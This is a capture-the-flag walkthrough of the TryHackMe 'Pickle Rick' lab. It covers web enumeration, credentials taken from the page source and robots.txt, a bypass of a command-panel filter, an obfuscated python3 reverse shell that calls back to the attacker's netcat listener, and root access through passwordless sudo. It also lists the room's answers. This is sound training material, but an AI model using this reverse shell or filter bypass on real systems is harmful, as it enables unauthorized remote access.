Pickle Rick TryHackMe

performed by: jb-williams

Pickle Rick

To access the box add the machines IP to this https://<IP>.p.thmlabs.com

  • Traveling to the sight we can start gathering information
  • First it is always good to View Page Source to see if there are any information disclosers accidently left in the html source code.
  • Doing so, you can see that a comment left in the source code is reminding Rick that the user name for their account is R1ckRul3s

  • Now we scan the box with nmap to see what info we can gather.
nmap -v -sC -sV -oN nmap/initial <IP>
  • Found that OpenSSH 7.2p2 on port 22
  • Found that Apache httpd 2.4.18 on port 80

  • While nmap was running I went to the site and just to check and see if there is anything interesting in the robots.txt file.
  • There was a single ‘word’ in that file: Wubbalubbadubdub

  • I like to use feroxbuster instead of gobuster, just preference. So I ran my normal feroxbuster cmd, which also routes it through my web-proxy zaproxy(similar to burp) so I can capture and reuse any requests.
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -x php,php5,htm,html,html5,js,txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.24.209/
  • Found a hidden /login.php route an began fuzzing Rick’s login with username R1ckRul3s
  • After some time of fuzzing the password with zaproxy and poking around some, I got back to the /robots.txt and was reminded about Wubbalubbadubdub.
  • I was able to login to Rick’s account with username: R1ckRul3s password: Wubbalubbadubdub

  • Logging in brought me to /portal.php with the first page being a Command Panel.
  • Immediately attempted to run ls and say that it did list out directory contents:
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
  • Trying to cat out any file responds with that command being disabled.
  • A go to for me, seems a little long, but usually works for me is this bash syntax: use absolute path if necessary, default would be files in current working directory
while read line; do echo $line; done < $FILE
ex:
while read line; do echo $line; done < Sup3rS3cretPickl3Ingred.txt
  • Did that with both Sup3rS3cretPickl3Ingred.txt(our answer for question one) and clue.txt(clue to next ingredient)

  • Tried some different commands and found that this slightly obfuscated python3 reverse shell was able to work. To get the shell I ran: local machine
nc -lnvp 4444

in the command panel I pasted this(make sure you change you your ip and port)

p\ython3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<IP>",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

  • Once I had a shell on the machine I ran ls /home to see any users’ home directories.
  • Noticed Rick’s so I ran ls -la /home/rick and saw second ingredients.
  • Seeing the output that way let me know that it was a file with a space in the name so to cat it out I ran:
cat /home/rick/second\ ingredients
  • And that got us the answer to the second question.

  • Gathering more information about the system I happened to run sudo -l and saw that user www-data(which was the user I was on as) could run any sudo command withought a password, so I ran:
sudo su
  • And was given root access.

  • I traversed over to the /root dir and listed it’s contents and saw 3rd.txt
  • After using cat to display 3rd.txt we got the answer for the last question.

What is the first ingredient Rick needs?

  • Answer: mr. meeseek hair

Whats the second ingredient Rick needs?

  • Answer: 1 jerry tear

Whats the final ingredient Rick needs?

  • Answer: fleep juice

written and performed by jb-williams - github